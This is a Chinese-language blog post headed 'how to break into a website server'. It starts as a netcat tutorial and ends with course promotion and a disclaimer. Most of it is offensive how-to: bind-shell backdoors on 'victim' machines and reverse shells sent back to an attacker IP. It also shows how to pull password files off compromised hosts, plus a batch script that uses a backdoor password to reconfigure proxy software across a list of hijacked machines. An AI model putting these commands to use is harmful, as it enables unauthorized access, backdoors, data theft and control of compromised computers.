如何侵入網(wǎng)站服務器免費企業(yè)黃頁查詢官網(wǎng)
NetCat是一個非常簡單的Unix工具,可以讀、寫TCP或UDP網(wǎng)絡連接(network connection)。它被設計成一個可靠的后端(back-end)工具,能被其它的程序程序或腳本直接地或容易地驅動。同時,它又是一個功能豐富的 網(wǎng)絡調試和開發(fā)工具,因為它可以建立你可能用到的幾乎任何類型的連接,以及一些非常有意思的內建功能。
? ?首先我們要弄明白netcat的工作原理,其實netcat的原理很簡單,它就是從網(wǎng)絡的一端讀入數(shù)據(jù),然后輸出到網(wǎng)絡的另一端,它可以使用tcp和 udp協(xié)議.之所以叫做netcat,因為它是網(wǎng)絡上的cat,想象一下cat的功能,讀出一個文件的內容,然后輸出到屏幕上(默認的stdout是屏 幕,當然可以重定向到其他地方).netcat也是如此,它讀取一端的輸入,然后傳送到網(wǎng)絡的另一端,就這么簡單.但是千萬不要小看了它,netcat可以完成很多任務,,尤其是和其他程序組合時.
? ?最簡單的使用方法,”nc host port”,能建立一個TCP連接,連向指定的主機和端口。接下來,你的從標準輸入中輸入的任何內容都會被發(fā)送到指定的主機,任何通過連接返回來的信息都 被顯示在你的標準輸出上。這個連接會一直持續(xù)下去,至到連接兩端的程序關閉連接。注意,這種行為不同于大多數(shù)網(wǎng)絡程序,它們會在從標準輸入讀到一個文件結 束符后退出。
? ?NetCat還可以當服務器使用,監(jiān)聽任意指定端口的連接請求(inbound connection),并可做同樣的讀寫操作。除了較小限制外,它實際并不關心自己以“客戶端”模式還是“服務器”模式運行,它都會來回運送全部數(shù)據(jù)。 在任何一種模式下,都可以設置一個非活動時間來強行關閉連接。
? 你可能會問“為什么不用telnet來連接任意的端口”?問題提得好(valid),這兒有一些理由。Telnet有“標準輸入文件結束符 (standard input EOF)”問題,所以需要在腳本中延遲計算以便等待網(wǎng)絡輸出結束。這就是netcat持續(xù)運行直到連接被關閉的主要原因。Telnet也不能傳輸任意的二 進制數(shù)據(jù),因為一些特定的字符會被解釋為Telnet的參數(shù)而被從數(shù)據(jù)流中去除。Telnet還將它的一些診斷信息顯示到標準輸出上,而NetCat會將 這信息與它的輸出分開以不改變真實數(shù)據(jù)的傳輸,除非你要求它這么做。當然了,Telnet也不能監(jiān)聽端口,也不能使用UDP。NetCat沒有這些限制, 比Telnet更小巧和快捷,而且還有一些其它的功能。
NetCat小巧且功能強大,描述它的功能就是象描述瑞士***的功能一樣。
? 如果沒有提供命令行參數(shù),NetCat會提示你從標準輸入來輸入命令參數(shù),然后NetCat會在內部解析輸入。用這種辦法輸入命令式參數(shù),可以用來防止借助“ps”來查看你的命令行參數(shù)。
主機參數(shù)可以是一個名字或一個IP地址。如果-n出現(xiàn),則它接受IP地址,而不再對計算機的名字或域名進行解析。如果沒有-n,但加上-v,則 NetCat可進行正/反向域名解析,并警告the all-too-common problem of mismatched name in DNS。這會耗費稍多一點時間,但在某些情況下會有用處。如,你想知道某個IP的主機名,NetCat可省卻你手工查找的時間。
? 要建立對外的連接,必須提供一個端口號,可以是個數(shù)字,也可以/etc/services列表中的端口服務名。當-n出現(xiàn)時,則只有數(shù)字形式的端口可以接收。
? -v參數(shù),可以將一些關于連接建立信息輸出到標準錯誤。-v參數(shù)多出現(xiàn)幾次,則顯示的信息會更多一些。如果-v參數(shù)沒有出現(xiàn),則NetCat將默默地工作,至到出現(xiàn)錯誤為止。
? -w參數(shù)后跟一個時間值,用以指定建立鏈接時的等待時間,-w如果多次出現(xiàn),則后面的值將取代前面的設置。-w還用來設置連接非活動時間,當標準輸入結束以后,如果等待指定的一段時間后仍沒有數(shù)據(jù)返回,則NetCat會再試一次,然后關閉連接并退出。
? 當-u參數(shù)出現(xiàn)時,用UDP建立連接。
用-o logfile參數(shù),可以將連接上往來傳輸?shù)臄?shù)據(jù)以16進制的形式記錄到logfile中(每行的左半部分是16進制顯示,右半部分為ascii顯示)。其中,每行的第一個字符為”<”或”>”,分別表示接收的數(shù)據(jù)或發(fā)送的數(shù)據(jù)。
? NetCat用-s ip-addr或-s name來綁定本地網(wǎng)絡資源地址,-p portarg來綁定本地端口。除了因權限限制或端口已經(jīng)使用外,-p可以綁定任何端口。Root用戶可以綁定保留的1024以內的端口。如果不用-p指 定端口,則使用系統(tǒng)給定的未使用的端口。(-p功能在客戶端狀態(tài)也可以使用,-s功能并不是在所有的平臺上都可用)
? -l參數(shù)可以使NetCat以服務器狀態(tài)運行。”nc -l -p 1234 [remote hostname] [remote port]”可以用來指定入連的主機和端口,如果申請連接的主機或端口不符指定,則會斷開連接。
? 當編譯時置-DGAPING_SECURITY_HOLE,則-e參數(shù)被NetCat支持。-e后面跟一可執(zhí)行程序的名稱,當一個連接(入或出)被建立 時,這個程序被運行。尤其當NetCat以服務器端運行時,-e參數(shù)使其有點象inetd了,只是只能運行一個進行而已。需要說明的是,-e后的程序不能 從NetCat的命令行接收參數(shù),如果有參數(shù)要傳遞,可能需要一個腳本。
? 當編譯時置-DTELNET,則-t參數(shù)被支持,此時NetCat可以登錄到一個telnetd服務器,并提供相關的握手應答,至到出現(xiàn)登錄提示符。
? NetCat用8k的讀寫,來盡可能高效將收到數(shù)據(jù)顯示到標準輸出上及將標準輸入寫到連接上。-i參數(shù),可以用來設置發(fā)送一行標準輸入信息的間隔,以減少發(fā)送速度。
? 端口掃描是一探測主機服務的流行方法。NetCat的命令行中,先是參數(shù),再是主機,最后是端口。端口可以是一些服務名、端口號,或者是一個端口范圍(形 如N-M)?!眓c -v -w 2 -z -i 1 20-30”用來掃描target主機的20-30(兩端包含)端口,-z表示不發(fā)送任何數(shù)據(jù)到TCP連接或非常有限的數(shù)據(jù)到UDP連接。-i用以指明兩 個端口建立連接的時間的間隔。-w用以指明連接不活動時間。通常情況下,掃描按從高到低的順序依次掃描指定的端口,-r參數(shù)可以讓NetCat在指定的端 口范圍內隨機地掃描端口。(當-r被用于單個連接時,本地的端口在8192以上,除非用-p指定)
以上為最基本的幾種用法,其實NC的用法還有很多,當配合管道命令“|”與重定向命令“<”、“>”等命令時功能更強大。
其部分參數(shù)意義如下:
-d 后臺模式
-e prog 程序重定向,一旦連接,就執(zhí)行[危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監(jiān)聽模式,用于入站連接
-L 連接關閉后,仍然繼續(xù)監(jiān)聽
-n 指定數(shù)字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 隨機本地及遠程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 詳細輸出——用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉——用于掃描時
端口的刺探:
nc -vv ip port
RIVER [192.168.0.198] 19190 ?open //顯示是否開放open
掃描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
這樣掃描會留下大量的痕跡,系統(tǒng)管理員會額外小心
后門
victim machine: //受害者的機器
nc -l -p port -e cmd.exe //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻擊者的機器.
nc ip -p port //連接victim_IP,然后得到一個shell。
反向連接
attacker machine: //一般是sql2.exe,遠程溢出,webdavx3.exe攻擊.
//或者wollf的反向連接.
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1 /*用于輸入*/
nc -vv -l -p prot2 /*用于顯示*/
victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2
139要加參數(shù)-s(nc.exe -L -p 139 -d -e cmd.exe -s 對方機器IP)
這樣就可以保證nc.exe優(yōu)先于NETBIOS(windows環(huán)境)
傳送文件:
attacker machine <-- victim machine //從肉雞拖密碼文件回來.
nc -d -l -p port < pathfiledest ? ? /*attacker machine*/ 可以shell執(zhí)行
nc -vv attacker_ip port > pathfile.txt /*victim machine*/ 需要Ctrl+C退出
//肉雞需要gui界面的cmd.exe里面執(zhí)行(終端登陸,不如安裝FTP方便).否則沒有辦法輸入Crl+C.
attacker machine --> victim machine //上傳命令文件到肉雞
nc -vv -l -p port > pathfile.txt ? ? ?/*victim machine*/ 需要Ctrl+C退出
nc -d victim_ip port < pathfiledest ? /*attacker machine*/ 可以shell執(zhí)行
//這樣比較好.我們登陸終端.入侵其他的肉雞.可以選擇shell模式登陸.
結論: 可以傳輸ascii,bin文件.可以傳輸程序文件.
問題:連接某個ip后,傳送完成后,需要發(fā)送Ctrl+C退出nc.exe .
或者只有再次連接使用pskill.exe 殺掉進程.但是是否釋放傳輸文件打開的句柄了?
端口數(shù)據(jù)抓包.
nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...
< 00000084 83 00 00 01 8f # .....
telnet,自動批處理。 ★★★★★我要重點推薦的東西就是這個.
nc victim_ip port < pathfile.cmd ? /*victim machine*/ 顯示執(zhí)行過程.
nc -vv victim_ip port < pathfile.cmd ? /*victim machine*/ 顯示執(zhí)行過程.
nc -d victim_ip port < pathfile.cmd 安靜模式.
_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd
md test
cd /d %windir%system32
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
_______________file.cmd__END___________________
######################################################################
管理肉雞,更改肉雞設置
######################################################################
比如要統(tǒng)一更改肉雞上面的代理端口.snake.exe 修改為11111 服務名稱"sksockserver"
使用winshell后門. 端口1234 密碼password
命令格式就是
modi.bat youip.txt
___________modi.bat____________________________
@if "%1"=="" echo Error: no ip.txt &&goto END
:start
@echo password >a.cmd
@echo s >>a.cmd
@echo cd /d %%windir%%system32 >>a.cmd
@net stop "sksockserver" >>a.cmd
@snake.exe -config port 11111 >>a.cmd
@net start "sksockserver" >>a.cmd
@exit >>a.cmd
:auto
@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)
:END
___________modi.bat__END_______________________
網(wǎng)絡安全學習路線
對于從來沒有接觸過網(wǎng)絡安全的同學,我們幫你準備了詳細的學習成長路線圖??梢哉f是最科學最系統(tǒng)的學習路線,大家跟著這個大的方向學習準沒問題。
同時每個成長路線對應的板塊都有配套的視頻提供:
需要網(wǎng)絡安全學習路線和視頻教程的可以在評論區(qū)留言哦~
最后
- 如果你確實想自學的話,我可以把我自己整理收藏的這些教程分享給你,里面不僅有web安全,還有滲透測試等等內容,包含電子書、面試題、pdf文檔、視頻以及相關的課件筆記,我都已經(jīng)學過了,都可以免費分享給大家!
給小伙伴們的意見是想清楚,自學網(wǎng)絡安全沒有捷徑,相比而言系統(tǒng)的網(wǎng)絡安全是最節(jié)省成本的方式,因為能夠幫你節(jié)省大量的時間和精力成本。堅持住,既然已經(jīng)走到這條路上,雖然前途看似困難重重,只要咬牙堅持,最終會收到你想要的效果。
黑客工具&SRC技術文檔&PDF書籍&web安全等(可分享)
結語
網(wǎng)絡安全產(chǎn)業(yè)就像一個江湖,各色人等聚集。相對于歐美國家基礎扎實(懂加密、會防護、能挖洞、擅工程)的眾多名門正派,我國的人才更多的屬于旁門左道(很多白帽子可能會不服氣),因此在未來的人才培養(yǎng)和建設上,需要調整結構,鼓勵更多的人去做“正向”的、結合“業(yè)務”與“數(shù)據(jù)”、“自動化”的“體系、建設”,才能解人才之渴,真正的為社會全面互聯(lián)網(wǎng)化提供安全保障。
特別聲明:
此教程為純技術分享!本教程的目的決不是為那些懷有不良動機的人提供及技術支持!也不承擔因為技術被濫用所產(chǎn)生的連帶責任!本教程的目的在于最大限度地喚醒大家對網(wǎng)絡安全的重視,并采取相應的安全措施
,從而減少由網(wǎng)絡安全而帶來的經(jīng)濟損失